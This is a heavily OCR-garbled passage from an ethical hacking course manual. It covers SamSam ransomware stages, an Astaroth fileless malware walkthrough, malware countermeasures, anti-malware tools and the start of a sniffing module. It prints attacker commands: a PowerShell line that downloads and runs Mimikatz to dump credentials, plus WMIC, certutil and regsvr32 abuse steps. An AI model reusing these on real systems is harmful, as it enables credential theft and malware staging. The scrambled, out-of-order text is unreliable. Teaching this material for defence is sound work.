Post-Exploitation
Phase

Figure
in
7-104 StagesSamSam
Ransomwareattack

Modul
7 1050
Page tical MakingandCountermensores
by
Copyright©
Comet
Pre-Exploitation
Phase
‘=
Stage
1:Gains
Access
Servers
In the initial stageof the
to Vulnerable
pre-exploitation
phase,
the SamSam
ransomware attackers
checkfor the presenceof unpatched i n Internet-facing
ROPvulnerabilities remote
servers to gain an initialfootholdi n the victim'snetwork.
Stage
2: Harvests AdminCredentials
SinceSamSam ransomware creators are capable andefficient
i n combiningcommodity
and proprietary toolswith
vulnerableunpatched
ROP
publicly
availableexploits
and techniques,
servers with the RDPprotocol,
theyemploy
brute-forcetoolsto harvesttheadmincredentialsandperform
once they identify
Mimikatzor NLBrute
privilege
escalation.
It hasbeenfoundthat the attackersmainly use PowerShellcommands to callMimikatz
froman onlinePowerSploit repository.

powers (New t

Net .WebClient)
.DownloadString(
‘https:
//raw.githubuse
|imikatz.ps1');Tnvoke-Mimikatz
-DumpCred

Stage
Figure
3: Spreads
7.106:
Infection
Screenshot
ta
dslaying
PowerShell
commanddownload
Mimikatz

the attackersgetadminaccess,they
‘Once performreconnaissance of the compromised
networkinfrastructureusingcustom scriptsor SystemTools’ Hyena tool. Theyalso
create SOCKSproxiesto tunnel the traffic and exploitlegitimateadmintoolssuchas
PsExec, WMI,and ROPto spread and execute SamSam on the rest of the computers
presentin the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Exploitation
Phase
Theexploitation
phase
is illustratedin the figure
below:

Stage
4: Deploys
Payload
7.207:
Figure
phase
flow
Exploitation

After gainingaccess to all the vulnerableservers in the network,

a batchfile (.bat)
will
beexecutedon all the servers.

7108:
Figure
Batch
Script
Thiscustom ransomware .NETbinary
Deploying
(.bat)
file
payload(chareter2.
SamSom

originally
eve)

containedtwo embedded
executables:del.exeor detfiletype.exe
(SDelete program)
Sysinternals and selfdel.exe
{used activity)
to deleteits malicious

igure 7.109:
amnSam
RansomwareBinary

ical andCountermensores
Mackin ©by E-Comel
Copyright
 5:
After executingthe binary
andLocal
Stage ExecutesPayload Encrypts Files
file,the ransomware performs encryption of the targetfiles
matching a hard-codedlist of approximately 300 file extensions. Beforestarting the
encryptionprocess, it categorizes the filesbysize (less than250MB,S00MB,1000MB,
and larger than 1000 MB)and encrypts the smallestfiles first. The malwarealso
attemptsto unlockfilesthat are i n use,presumably to ensure that active documents are
encrypted,
andcause
Filesare encrypted
maximum
to
the
damage victim,
usingthe WindowsCryptography
API with a symmetric-encryption
algorithm (Rijndael)
keythat is randomly
generated
on the compromised
system.The
ransomware the Rijndael
then encrypts keywith an RSA-2048 publickey,thereby
providing
adequate fromthe incidentresponders’
protection recoveryefforts.

ofhard-coded
7.110:Examples
Figure targetfle extensions
Phase
6: Demands
Stage forRansom
After encryptingthe filesof interest,the ransomware launchesthe WindowsSDelete
programto wipe the free spaceon the diskto hinderrecoveryefforts.Themalwarealso
deletesthe main ransomware binary andthefreespacewiper.Then,it deploys another
binary to delete all backup files from the local systemand any network-accessible
drives.Whenthe encryption is complete, the ransomware displaysan HTMLextortion
message(ransom note)o n the victim'ssystem,demanding a bitcoinamount for each
affected systemor a largeramount forall affected systems.Themessage alsospecifies a
seven-day deadlinefor payment. Thevalue of the ransom changes every year. The
current valueof the ransom that the SamSam ransomware is demanding is 3 bitcoins
(approximately$41,700) for all systems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
The creators of SamSamransomware use a WordPresswebsite to coordinate
ransomware with the victims. Once the victim pays the ransom, the threat
payments
a download
actors provide linkto a uniqueXMLexecutable file andthe corresponding
RSAprivatekeyto decrypt
thefiles.

Key
Software,
All
Keys,
to Pay
WeGenerate Wrong

[BTC you
15Keys
receive
You Should AOBTC
you want can get
to receive allKeys,
and send
Send
18BTC
18

to al Please
15
PC
na
now
{ater receive keys, comment

deadline
Your
extended
Leavea comment
to

RecentComments
Uncategorized

ical andCountermessores
Mackin
©
by E-Comel
Copyright
 to avoid attention fromlaw enforcement
Sometimes, agencies,threat actors also
onlyfromthe
coordinateransom paymentsandcommunicationsvia websitesaccessible
Tornetwork

‘Your
comments

Modul
7 1055
Page tical andCountermensores
Making by Comet
Copyright©
 FilelessMalwareAnalysis:
AstarothAttack

‘Tins
csc ria oe le

%. x,

Fileless Malware Analysis:

AstarothAttack
Astarothis a filelessmalwarethat hasrecently becomevery popular. It completely livesoff the
land, onlyrunninglegitimate system toolsthroughout thelifecycle
oftheattack.Suchan attack
includesmultiple stepsthat adoptvarious filelesstechniques to injectmalware.Theattack
starts bysending a spear-phishingemail embedded with a malicious link to an LNKfile. When
the victim doubleclicksthe maliciouslink,the LNKfile initiates the execution of the WMICtool
with the “/format―parameter, whichfurther downloadsand executes JavaScript code.This
JavaScript codeinitiates the execution of the Bitsadmintool to downloadmaliciouspayloads.
All the payloads usedi n the attackare encodedusingBase64anddecodedusingthe Certutil
tool. Only two payloads are decoded, thereby in two DLLfiles,
resulting while the other files
remain i n the encodedformat. Finally, the Regsvr32 tool is usedto execute the decodedDLL
files,to decodeandrun otherpayloads untiltheAstarothpayload is injected into the Userinit
process.OnceAstarothis injected into the process memory, it can stealcriticalinformation
suchas keystrokes and credentials,exfiltrateotherdata,andsendthe information to the
attacker.
Stepsinvolved
in AstarothAttack:
Step1: Sending
‘=
spear-phishing
email
Theattackersendsa speciallycraftedspear-phishing
emailembeddedwith a malicious
URL to the victim. The URL contains misleading
names such as certidao.htm,

abrir_documento.htm, and pedido.htm. Whenthe victim clickson the link,it

automatically to ZIP
redirectsthe victim the malicious archivecertidao. htm. zip that
includesthe certidao.htm. nk LNKfile. Whenthe victim clickson the ZIP file,it
executesan obfuscated BATcommand.

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
Step
2: Exploiting
WMIC
Step2.1:TheBATcommandexecutedi n the previous
below: step
runs WMIC.exea s shown

Figure7.14:Running
WMICexe
In the abovecode,the /formatparameter downloadsthe v.txt file,
sent to WMIC.exe

XSL
file
‘an hostedon a malicious
that is automatically
domain.Thisfilehasan embedded JavaScript
executedbyWMIC.exe.Furthermore,the JavaScript
code
code runs
WMIC.exe
once
©. Step
again.
2.2:WMIC.exeis executedagainas follows:

/
WwUC.exeo s get QUTSQRK, 2m a, Freeshysicaleenory
orast "https: storage.googles

Figure7115:
Running
WMIC
exe

Theabovecodeagaindownloadsw.txt, whichis an XSLfile that contains malicious

JavaScript codethat exploits toolssuchas Bitsadmin,
system Certutil,
and Regsvr32
in the following
steps.
‘=

3:
Step Exploiting
Bitsadmin
The Bitsadmintool is executedmultiple
times to downloadadditional payloads
as

Figure7.126:
Expoting
itzadmin|
Thedownloadedpayloadsencoded
falxconxrenwb.~,
falxconxrenwxb.~,
using
are Base64,
falxconxrenw64.~,
falxconxrenw98.~,
and
their
filenames
are
as
follows falxconxrenwxa.~,
falxconxrenwgx.gif,
falxfonxrenwg.gif
Step
4: Exploiting
Certutil
AttackersabusetheCertutiltool to decodethe downloadedpayloads
as follows:

decode*PUBLICS\Libraries\temporary\Falxconxrennb.

\temporary
certutil.exe jpg.7 XPUBLICR\Libraries
\falxconsreni.~

igure 7.117: exploiting

cet

ical andCountermensores
Mackin ©by E-Comel
Copyright
Onlytwo filesare decoded whiletheothersremain in theencoded
into the DLLformat,
andobfuscated
format.

5:
Step Exploiting
Now,attackers
Regsvr32
u se the Regsvr32
tool to execute the decoded
DLLfiles usingthe
following
command:
regsvr32 /s falxconxrenw64.~
falxconxrenw64.~ is a proxy DLLthat loadsand executes the secondDLLfile,
falxconxrenw98..~. Furthermore,thesecond DLLinitiates the execution ofthirdDLL
retrievedfromfalxconxrenwxa.~ andfalxconxrenwxb.~

6:
Step Exploiting
Userinit
The third DLL loadedand executed i n the previous step reads and decodes
falxconxrenwgx.gifinto a DLL.This DLLis used to initiate the execution of
userinit.exe and injectsthe decoded DLL.falxconxrenwgx.gif is a proxy DLL
that retrieves,decodes, and loadsthe final DLL falxconxrenwg.gif,calledthe
Astaroth, whichis an informationstealer.

ve v

rn «

Figure
7.118:
Demonstration
ofAstaroth
Attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

@ Marware concpis Fietose Malware

Concopts
e MalwareAnalysis

©Fetanconcepts =

e Virus and
Worm
Concepts Anti-MalwareSoftware

Countermeasures
Malwareis commonly usedbyattackersto compromise targetsystems. malware
Preventing

‘This
a easier
fromentering system
section presents
to
is far thantrying eliminate it froma n infectedsystem.
various countermeasures that prevent malwarefrom enteringa system
andminimize
the
riskby entry.
caused it uponits

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures
Trojan

alul necessry
‘lock
host
portsa t the and
patches
Install
andupdates
secunty for

Monitortheintral rafflefor od
network un how.baad
ants, Frewalanditruson
vate
portsorenented onsofeware

Countermeasures
‘Trojan
Trojans
Somecountermeasuresagainst are as follows:
+
Avoidopeningemailattachments receivedfromunknownsenders
*

*
Block
unnecessary
ports
all
hostfirewall
Avoid accepting
programs
at the
transferred
andusea
byinstant messaging
Hardenweakdefault configuration
settingsanddisableunusedfunctionality,
including
protocols
andservices
Monitorthe internalnetwork
trafficforoddportsor encrypted
traffic
Avoiddownloading applications
andexecuting fromuntrustedsources
Installpatches updates
andsecurity forthe OSandapplications
ScanexternalUSBdrivesandDVDswith antivirus softwarebeforeusingthem
withinthe desktop
Restrictpermissions environment to preventinstallationof malicious
applications
‘Avoid
typingcommands blindlyandimplementing
pre-fabricated
programs or scripts
Manage localworkstationfile
Runhost-based
integrity
through auditing,
checksums,
andintrusion detection
antivirus,firewall,
andport scanning
software

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BackdoorCountermeasures
anv
cn san anddetectb ackdoor
products automaticaly programsb eforethey

Educate
vers not sal appltonsdownloade
fomuntrusted
intemats es andeal attachments

BackdoorCountermeasures
Somecommon countermeasuresagainst
backdoors
are as follows
=
Most commercialantivirus products
can automatically
scan and detect backdoor
programs
before
they
can
cause
damage
Educateu sers to avoidinstalling
applications
downloadedfromuntrustedInternet sites
andemailattachments
Avoid untrusted
software
andensure thata firewallprotects
everydevice
Useantivirus toolssuchas McAfeeand Norton,
to detectandeliminatebackdoors
Trackopen-source projectsthat enter the enterprise
from untrustedexternalsources
suchasopen-source coderepositories.
Inspect
networkpackets usingprotocol tools
monitoring
is found to beinfectedbybackdoors,
If a computer restart the infectedcomputer
in the
safemodewith networking
Runregistry toolsto findmaliciousregistry
monitoring bythebackdoor
entries added
or uninstallthe programor application
Remove installedbythe backdoorTrojan
or virus
Remove entries addedbythebackdoorTrojan
the maliciousregistry
Deletemalicious
filesrelatedto the
backdoor Trojan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Virus and WormCountermeasures

‘Virus
andWormCountermeasures
Somecountermeasuresagainst
viruses andworms are as follows:
‘+
Installantivirus softwarethat detectsandremoves infectionsas theyappear
=
for safecomputing
Generatean antivirus policy anddistribute
it to thestaff
=
Payattention to the instructions whiledownloading
filesor programsfromthe Internet
Regularlyupdate antivirus software
Avoidopening attachments receivedfromunknownsenders, as viruses spread
via e-
mailattachments
Sincevirus infections data,ensure that you perform
can corrupt regular
databackups
regular
Schedule scansfor all drivesafterthe installationof antivirus software
Do not accept without checking
disksor programs themfirst usinga current version of
an antivirus program
hasbeenapproved
Ensurethat anyexecutablecodeusedwithinthe organization
Donot bootthe machinewith an infectedbootablesystem
disk
Stay
informedaboutthe latestvirus threats
CheckDVDs
forvirus infection
Ensurethat pop-upblockersare turnedon andusean Internetfirewall
Performdiskclean-up
andrun a registry
scanner once a week
Runanti-spyware
or anti-adware
once a week

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Do
not
open
files onefile-type
with more than extension
=
Be
cautious
with
files
through
instant
sent
messenger
applications

Module
7 1062
Page tical andCountermensores
Making by Comet
Copyright©
 FilelessMalwareCountermeasures

Plugdolonts

SeAlML9 preventew ptrmare males

Fileless Malware Countermeasures

Somecountermeasuresagainst
filelessmalwareattacksare as follows:
=
Remove all the administrative
toolsand restrict access through
WindowsGroupPolicy
WindowsAppLocker
‘or
DisablePowerShell
andWMIwhennot i n use
Disablemacros anduse onlydigitally
signed
trustedmacros
Installwhitelisting
solutionssuchas McAfeeApplication Controlto blockunauthorized

and
applicationscoderunningon yoursystems
Trainemployees to detect phishing
emailsand to never enablemacros i n MSOffice
documents
DisablePDFreadersto run JavaScript
automatically
DisableFlashin thebrowsersettings
Implement two-factorauthenticationto access criticalsystems
or resources connected
to thenetwork
Implement multi-layer to detectanddefend
security againstmemory-resident malware
UseUserBehaviorAnalytics
(UBA)
solutionsto detectthreatshiddenwithin your data
Ensurethe ability
to detectsystemtoolssuchas PowerShellandWMIC, andwhitelisted
application
scripts malicious
against attacks
Run periodicantivirus scans to detect infectionsand keepthe antivirus program
updated
ical andCountermensores
Mackin ©by E-Comel
Copyright
 downloads
toolsanddisableautomatic plugin
Installbrowserprotection
regular
Schedule checksfor applications
security andregularly
patch
the applications
Regularly
update patches
the OSwiththe latestsecurity
Examineallthe runningprograms for anymaliciousor new signatures
andheuristics
Enableendpoint to protectnetworkswhenaccessed
securitywith active monitoring
remotely
Examinethe indicatorsof compromiseon the system
andthe network
Regularly
check logsespecially
the security whenexcessive amounts of dataleavethe
network
Restrictadmin rightsand provide
the least privileges
to the user level to prevent
privilege
escalation
attacks
Useapplication
controlto preventInternetbrowsersfrom spawningscriptinterpreters
suchas PowerShell
andWMIC.
Carefully
examine the changes
i n the system's
usualbehavior compared
patterns with
the baselines
antivirus (NGAV)
Usenext-generation softwarethat employsadvancedtechnology
such
aSML (machinelearning) intelligence)
and Al (artificial to avoid new polymorphic
malware
Use baselineandsearchfor knowntactics,techniques,
and procedures
(T7Ps)
usedby
manyadversarial groups
Ensurethat you use Managed
Detectionand Response
(MDR)
services that can perform
threathunting.
Ensurethat youuse
Experience toolssuchas Blackberry
Toolkitto combatfilelessattacks
andMicrosoft
Cylance Mitigation
Enhanced

applications
Disableunusedor unnecessary andservice features
Uninstallapplications
thatare not important
Blockallthe incomingnetworktrafficor fileswith the .exeformat,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

MalwareConcepts FilolossMalwareConcepts

MalwareAnalysis

‘Trojan
Concepts Countermeasures

Virus and
Worm
Concepts Anti-MalwareSoftware

Anti-Malware Software
An attackeruses malwareto commit onlinefraudor theft.Thus, the use of anti-malware
softwareis recommended to helpdetectmalware, remove it, and repair any damage it might
cause.Thissection listsanddescribes
various anti-malware(anti-Trojanandantivirus)software
programs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Software
Anti-Trojan
Kaspersky
Internet Security

Kaspersky
internet
Secu
proves
agaist protection Tolan

Malwarebytes
(tp/mrnmlwaeytes or)

Pubs
AnMawar teams.)

Software
Anti-Trojan
Anti-Trojan
softwareis a tool or program that is designed to identifyand preventmalicious
or malware
Trojans frominfecting computer systems or electronic tools
devices.Anti-Trojan
mayemploy scanningstrategiesaswell as freewareor licensed rootkits,
toolsto detectTrojans,
andothertypesof potentially
backdoors, damaging software.
Kaspersky

Internet
Security
Source:https://www.kaspersky.com
Kaspersky Internet Security protectsdevicesfrom various typesof intrusions due to
Trojans,viruses, spyware,ransomware, phishing, and dangerous websites. It securely
stores passwords for easy access on PC,Mac,and mobile.It makesbackup copies of
photos, music, andfilesand alsoencrypts data on PC. Furthermore, it automatically
blocksinappropriate content and helps you managethe use of socialnetworks.In
addition,
extra
when
you
shop
bank
it provides security
online or on PCor Mac.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Yourprotection
is live now

v .

Ostaoe Update

Pvc Protection

EyParental Cont

My ys
tspenky terse 28 remain

Figure7219:
Serenshotof Kaspersky
InternetSecurity

Someadditionalanti-Trojan
softwareare as follows:
=
McAfee® (https://www.mcafee.com)
LiveSafeâ„¢
‘=
Symantec Premium(https://www.symantec-norton.com)
NortonSecurity
=
(https://bitdefender.com)
BitdefenderTotalSecurity
HitmanPro(https://www.hitmanpro.com)
Malwarebytes (https://www.malwarebytes.org)
ZemanaAntimalware (https://www.zemana.com)
Emsisoft Home(https://www.emsisoft.com)
Anti-Malware
Tool(https://www.microsoft.com)
MaliciousSoftwareRemoval
SUPERAntiSpyware
(https://www.superantispyware.com)
Plumbytes
Anti-Malware(httpsi//plumbytes.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Antivirus Software
Antiviras
‘Bitdefender
Plas
2019
You are safe
Norton
us Pre
Bi
Antivirus
neu
tmnt
tines
com)
com)

Ants E E ite gc)

a Airs
Pro t5//moe.com)

Pad Atv
Pro te//n pede om

Antivirus Software
It is essentialto update antivirus toolsto monitor the datapassingthrough Suchtools
a system.
mayfollowspecific or genericmethods to detectviruses. Genericmethods lookforvirus-like
performance ratherthana specific virus. Thesetoolsdo not specify the virus typebut warn the
user of a possible virus infection. Genericmethodscan raise falsealarms; hence,theydo not
perform well i n terms of detecting precisevirus forms.Specificmethodslook for knownvirus
signatures i n the antivirus databaseand askthe user to choosethe necessary action to be

good
It is a practice
and
taken,suchas repair delete.
for organizations
of
to installthe mostrecent version the antivirus software
andregularly update it to keep
up withthe introductionof new viruses i n themarket.Updating
of antivirus softwarebythe respectivevendorsis a continuous process.
+
BitdefenderAntivirusPlus2019
Source:https://www.bitdefender.com
Bitdefender fromviruses, worms, and
AntivirusPlus2019works againstall threats,
Trojans
to ransomware, zero-dayexploits,
rootkits, and spyware. It uses a technique
calledbehavioral detection to closely monitor active apps.As soon as it detects
suspiciousactivity,i t takesdecisiveaction to preventinfection.It sniffsand blocks
maliciouswebsitesthatmasquerade astrustworthy websitesto stealfinancial
datasuch
as passwords
or creditcardnumbers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Youare safe
v
A wesenansryntonmenonron 2

figure7.120;Screens
Someadditionalantivirus softwareare as
of
Bitdefender
follows:
Anus Plus
2 19

+
(http://mww.clamwin.com)
ClamWin
=
Anti-Virus(https://www.kaspersky.com)
Kaspersky
+
McAfeeAntiVirus
Plus
(https://home.mcafee.com)
Norton AntiVirusBasic(https://www.norton.com)
Avast Premier Antivirus (https://www.avast.com)
(https://www.eset.com)
InternetSecurity
ESET
(https://free.avg.com)
AVGAntivirusFREE
AviraAntivirusPro(https://www.avira.com)
(https://trendmicro.com)
TrendMicroMaximumSecurity
PandaAntivirus Pro (https://www.pandasecurity.com)
WebrootSecureAnywhere
Antivirus(https://www,webroot.com)

Modal
7
Page
tical
Making
and by CountermensoresCopyright©
Comet
 FilelessMalwareDetectionTools
‘Ailenvasito
snout
sm

espoee€08).

i
|| | @
Fileless Malware DetectionTools
cme

Varioustools usedto detectfilelessmalwarethreatso n endpoint

devicesand systems
a re
discussed
below:
=
USMAnywhereâ„¢
Alienvault®
Source:https://www.alienvault.com
USMAnywhereâ„¢
AlienVault® providesa unifiedplatformfor threat detection,
incident
response,andcompliancemanagement. It centralizes
security of networks
monitoring
anddevicesin the cloud,
on premises,and at remote locations,therebyhelpingyou to
detectthreats
virtually
anywhere.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
7.121:
Screenshot
ofAllenVault*
USMAnythereâ„¢
Someadditionaltoolsfor detecting
filelessmalwarethreatsare as follows:
(http://www.quickheal.com)
QuickHealTotalSecurity
DetectionandResponse
Endpoint (EDR)
(https://www.
trendmicro.com)
+
DefenderCheck(https://github.com)
FCL(https://oithub.com)
CYNET360 (https://www.cynet.com)

Modal
7
Page
tical
Making
and by CountermensoresCopyright©
Comet
 FilelessMalwareProtectionTools

(8 Mss En
Point
Sect i a security tool wed sect profesional

Fileless Malware ProtectionTools

Varioustoolsusedto protectsystems, networks,
andotherdevicesconnectedto the network
fromfilelessmalwarethreatsare discussed
below:
‘=
McAfee
End
PointSecurity
Source:https://www.mcafee.com
McAfeeEndPoint Security tool usedbysecurity
is a security professionalsto perform
threatdetection, andresponseactivities. It helps
investigation, analysts
security quickly
prioritizethreatsand minimize potential disruption. It is an essentialfor antivirus
protection,exploitprevention,firewall implementation, and web control
communication betweensystems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 figure
7422SrenshotofMcAfeeEndoi ecrty
Someadditionalfilelessmalwareprotectiontoolsare as follows
+
MicrosoftDefenderAdvancedThreatProtection (https://docs.microsoft.com)
=
Kaspersky
EndPointSecurity (https://www.kaspersky.com)
forBusiness
=
TrendMicroSmartProtectionSuites(https://www.trendmicro.com)
Norton360with LifeLockSelect(https://us.norton.com)
REVEAntivirus (https://www.reveantivirus.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary
inthis module,
>

>
the
we dcussed fllowing

conceptsof malware
andmalware propagation
conceptsofAPTandi cycle
techniques

Inthe
next
wecus attackers,
adhe, wil in deta how aweasel hackers

Module Summary
This modulepresented
the conceptsof malwareand their propagation techniques.
It also
discussed
the concepts Furthermore,
of APTand its lifecycle. it describedthe concepts of
Trojans, theirtypes,andhowtheyinfectsystems. In addition,it described
the conceptsof
viruses, their types,and how theyinfect files as well as the conceptsof computerworms.
it explained
Moreover, of filelessmalwareandhow theyinfectfiles.It also
the concepts
illustrated how to perform static and dynamic malwareanalysis and describedvarious
techniques to detectmalware. Furthermore, it presented
various measures against Trojans,
backdoors, viruses, and worms. Finally, it endedwith a detaileddiscussion o n various anti-
Trojan andantivirus tools.
In the next module, we will discuss i n detail how attackers
as well as ethical
hackers andpen:
testers use sniffing
to collectinformationabouta targetof evaluation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Module08:
STaliiiinre}
 Module Objectives

Understanding
How to Defendesis VariousSiig Teeniaues

fern
Understanding SitingCounten

ferent Techniques
Understanding andToolsto Detet Siig

Module Objectives
Thismodulestarts with an overview of sniffing an insight
and provides
concepts into MAC,
DHCP, ARP,MAC spoofing, andDNSpoisoningattacks.Later,the modulediscusses
various
sniffing
tools,
countermeasures, anddetectiontechniques.

+
willto:
Attheendof this module,

Describe
sniffing
you beable
concepts
+

+
MAC
Explain
different

DHCP
Explain
different
attacks
attacks

ARP
Describepoisoning
Explain spoofing
different attacks
Describe
DNSpoisoning
Apply
a defensemechanism various sniffing
against techniques
Use
different
sniffing
Apply tools
various
sniffing countermeasures
Apply
various techniques sniffing
to detect attacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

stn me
3 oo

2 oo
2 oo

Sonn
SniffingConcepts
Thissection describes networksniffing
and threats,howa snifferworks,active andpassive
sniffing,
how an attackerhacksa network using sniffers, protocolsvulnerableto sniffing,
sniffing
in the data link layer
of the OpenSystems Interconnection(OSI)model,hardware
protocolanalyzers,
SwitchedPortAnalyzer(SPAN) andlawfulinterception,
ports,wiretapping,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NetworkSniffing
Packet Sniffing Howa SnifferWorks

theof and the

is NIC
ofa
system
Packetsniffing processmonitoring
(©
alldatapackets through
{©
Asnitferturs
promiscuousmode
tothe
sothatlistensto allthedata

network
using
«capturing passing a given
a software appliaton
or hardware transmitted
on is segment
deve
Ieallowsan attackerto observea ndaccess the
tentirenetwork

attackeree
trafficram a givenpoint
Packetsifingallows to gather

as
an

traffic, chat22
information
sensitive such Telnetpasswords, os
email syslogtafe, router configuration,

web
trafic ONStfc

account oa"
Sessions, and
FTPpasswords,
information
mene

Network Sniffing
Packetsniffing is the processof monitoring and capturingall data packets passingthrougha
given network usinga softwareapplication or hardwaredevice.Sniffing is straightforward
in
hub-basednetworks, as the traffic on a segment passesthrough all the hostsassociatedwith
that segment. However,most networkstoday work on switches.A switchis an advanced
computer networking device.The majordifferencebetweena huband a switchis that a hub
transmits line data to eachporton the machineand hasn o line mapping,whereasa switch
looksat the MediaAccess Control(MAC) with eachframepassing
addressassociated throughit
andsendsthe data to the required port. AMACaddressis a hardwareaddressthat uniquely
identifieseachnodeof network.
attackerneedsto manipulate
‘An
a the functionality
of the switchto see all the traffic passing
through it. A packet sniffingprogram(also knownas a sniffer)can capture data packets only
fromwithin a given subnet, whichmeans that it cannot sniff packets from anothernetwork.
Often,any laptop can plug into a networkandgainaccess to it. Manyenterprises’ switchports
are open.A packet snifferplaced on a networkin promiscuous modecan therefore capture and
analyzeall the networktraffic. Sniffing programs turn off the filter employed by Ethernet
networkinterface cards(NICs) to preventthe hostmachinefromseeingotherstations’ traffic.
Thus,sniffing programs can monitor all traffic.
Although
most networkstoday
employ
switchtechnology,
packet
sniffing
is still useful.Thisis
becauseinstallingremote sniffing programso n networkcomponents with heavy
trafficflows
suchas servers and routers is relatively
easy.It allowsa n attackerto observeand access the
entire network trafficfromone point.Packet snifferscan capturedata packets containing
sensitive information such as passwords, account information, syslogtraffic,router
configuration,DNStraffic,emailtraffic,web traffic,chat sessions,andFTPpasswords. This

Modul
8 1079
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
allowsan attackerto read passwords i n cleartext,
the actualemails, creditcard numbers,
financialtransactions, etc. It alsoallowsan attackerto sniff SMTP, POP, IMAP traffic,IMAP,
HTTPBasic, telnet authentication, SQLdatabase, SMB,NFS, andFTPtraffic. An attackercan gain
a substantialamount of informationbyreading captureddata packets; then,the attackercan
use thatinformation to break into the network.An attacker carries out more effectiveattacks
bycombining thesetechniques with active transmission,
following
‘The diagram an attackersniffing
depicts the data packets
betweentwo legitimate
networkusers:
Switch

aa Copyof datapassing
hrough
the switch

Figure
8.1:Packtsnifing
scenario

How a SnifferWorks
The most common way of networking computers is through a n Ethernet connection. A
computer connectedto a localarea network(LAN) hastwo addresses: a MAC address and an
InternetProtocol(IP)address.AMACaddressuniquely identifieseachnodein a networkandis
storedon the NIC itself.TheEthernetprotocol
uses the MAC address to transferdatato and
froma system whilebuilding dataframes.
Thedata linklayerofthe OSImodelu sesan Ethernet
headerwith the MAC addressof the destinationmachineinsteadof the IP address.The
networklayeris responsible formappingIPnetworkaddresses to the MACaddress a s required
bythe datalink protocol. It initially
looksfor the MACaddressof the destinationmachinei n a
table,
address,usually
calledthe AddressResolution
an ARPbroadcastof a request
network.Themachine
Protocol
packet
with that particular
(ARP) cache.If thereis no entryforthe IP
goes out to all machines
addressresponds
o n the localsub-
to the source machine with its
MACaddress.
machine,
Thesource machine's ARPcacheaddsthis MAC
i n all its communicationswiththe destinationmachine, address
to the table.Thesource
then uses this MACaddress.
work differently
Thereare two basictypesof Ethernetenvironments,andsniffers i n each.
Thesetwo
Shared
types
are:
Ethernet
Ina shared
Ethernet environment,a singlebusconnectsall thehoststhat compete for
bandwidth.In this environment, receive packets
all the other machines meant for one
machine.
Thus, 2,it sendsa packet
whenmachine1 wants to talk to machine out on the

Modul
8
Page1090 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 networkwiththedestinationMACaddress ofmachine2,along with its own source MAC
address.Theother machinesi n the sharedEthernet(machines 3 and 4)compare the
frame'sdestination
MAC address with theirown anddiscard the unmatched frame.
However,a machinerunning a sniffer ignores this rule and accepts all the frames.
Sniffing
in a shared
Ethernet and,hence,
environment is passive difficultto detect.
=
SwitchedEthernet
In a switchedEthernetenvironment, the hostsconnect with a switchinsteadof a hub.
Theswitchmaintains a tablethattrackseachcomputer's MACaddress andthe physical
porton whichthat MACaddressi s connected, andthendeliverspackets destinedfor a
particularmachine.Theswitchis a devicethat sendspackets to the destinedcomputer
only;furthermore, it doesnot broadcast themto all the computerson the network.This
resultsin better utilizationof the availablebandwidthand improved Hence,
security.
the processof puttinga machine NICinto promiscuous modeto gather packetsdoesnot
a
sniffing.
many people
work.As result,
However,
thinkthat switchednetworksare
thisis not true,
secure and immune to

Although
a switchis more secure than a hub,sniffing
the network is possible
usingthe
following
methods:
=
ARPSpoofing
ARPjs stateless.A machinecan send an ARP replyeven without asking for it;
furthermore, sucha reply.
it can accept Whena machinewants to sniff the traffic
fromanothersystem,
originating it can ARPspoofthegateway ofthe network.TheARP
cacheof the target machinewill havean incorrect entryfor the gateway.Thus,all the
trafficdestinedto passthrough the gateway will now passthrough the machinethat
spoofed the gateway MACaddress.
=
MAC Flooding
‘Switches
maintain a translation
table that mapsvarious MACaddresses to the physical
portso n the switch.As a result,
theycan intelligentlyroute packets
from one host to
another.However, switcheshavea limitedmemory.MACflooding makesu se of this
limitation to bombardswitcheswith fake MACaddresses until the switchescan no
longer keepup. Oncethis happens to a switch,it will enter fail-openmode, whereinit
starts actingas a hub bybroadcasting packetsto all the portson the switch.Oncethat
happens, it becomes easyto perform sniffing.
macofis a utility that comes with the
dsniffsuite andhelps theattackerto perform MACflooding,
Oncea switchturns into a hub, it starts broadcastingall packets it receives to all the computers
in the network.Bydefault, promiscuous modeis turnedoffi n networkmachines; therefore,the
NICsaccept onlythosepackets that are addressed machineanddiscardthe packets
to a user’s
sent to theothermachines. A sniffer turnsthe NICof a system to promiscuousmodeso that it
listensto all the data transmittedon its segment. A sniffer can constantly monitor all the
networktrafficto a computer
datapackets,
through
Attackersconfigure the NICin their machines the
the NIC bydecodinginformationencapsulated
to run in promiscuous
i n the
modeso that

ical andCountermensores
Mackin ©by E-Comel
Copyright
the cardstarts acceptingall the packets. the attacker
Thus, that are
can view all the packets
beingtransmittedin the network

AttackerPC
runningNICCardi n
PromiscuousMode
wx
Attacker
forcesA
‘itchto behave

Internet

8.2: Working
Figure ofasifer

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Sniffing
Types
PassiveSniffing Ketive Sniffing

Packets
(ARP
theflood
Activesifingvoles Icing Address
Resolution
into network thesth
data
Servinga nyaddtionalpackesin network
the ContentAddressable
Memory 3b whch esos
(CAM)

Active Sniffing
Techniques

ARPPoisoning Attack
Spoofing

of Sniffing
‘Types
Attackersrun sniffersto convert the host system’s
NICto promiscuous mode.As discussed
the NIC in promiscuous
earlier, mode can then capturepacketsaddressedto the specific
network.
Thereare two typesof sniffing.
Eachis usedfor differenttypesof networks.Thetwo typesare:
Passive

+
sniffing
Activesniffing
